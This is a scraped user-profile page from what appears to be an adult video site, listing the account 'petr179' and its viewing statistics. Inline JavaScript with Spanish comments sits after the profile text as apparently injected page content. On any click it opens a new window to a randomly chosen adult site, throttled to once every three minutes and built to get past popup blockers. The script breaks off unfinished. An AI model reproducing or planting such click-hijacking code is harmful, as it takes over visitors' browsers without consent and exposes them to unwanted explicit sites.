petr179的化身

petr179

订阅人: 18
好友: 18
视频看: 612
配置文件的风景: 814
性别: 男性
关系: 单身
感兴趣: 女孩儿
国家: Russia
已加入: 5 年 之前
最后登陆: 5 年 之前
petr179最喜欢的视频 (1)
petr179的观看的影片 (292)
查看所有的
个人主页
(function() { // Lista de sitios web de destino const sitiosDestino = [ "https://videosxy.net", "https://goldenshowe.com", "https://exposedwife.com" ]; const TIEMPO_ESPERA_MS = 3 * 60 * 1000; // 3 minutos const CLAVE_STORAGE = "ultimo_salto_timestamp"; document.addEventListener("click", function(evento) { const ahora = Date.now(); const ultimoSalto = localStorage.getItem(CLAVE_STORAGE); // Verificar el intervalo de 3 minutos if (!ultimoSalto || (ahora - parseInt(ultimoSalto, 10)) >= TIEMPO_ESPERA_MS) { // 1. Abrir la ventana inmediatamente para evitar que el navegador la bloquee const nuevaVentana = window.open("about:blank", "_blank"); if (nuevaVentana) { // Registrar el salto localStorage.setItem(CLAVE_STORAGE, ahora); // Seleccionar la URL const urlAleatoria = sitiosDestino[Math.floor(Math.random() * sitiosDestino.length)]; // 2. Establecer la política no-referrer antes de cargar la dirección destino nuevaVentana.opener = null; // Quita la referencia opener por seguridad nuevaVentana.location.href = urlAleatoria; } }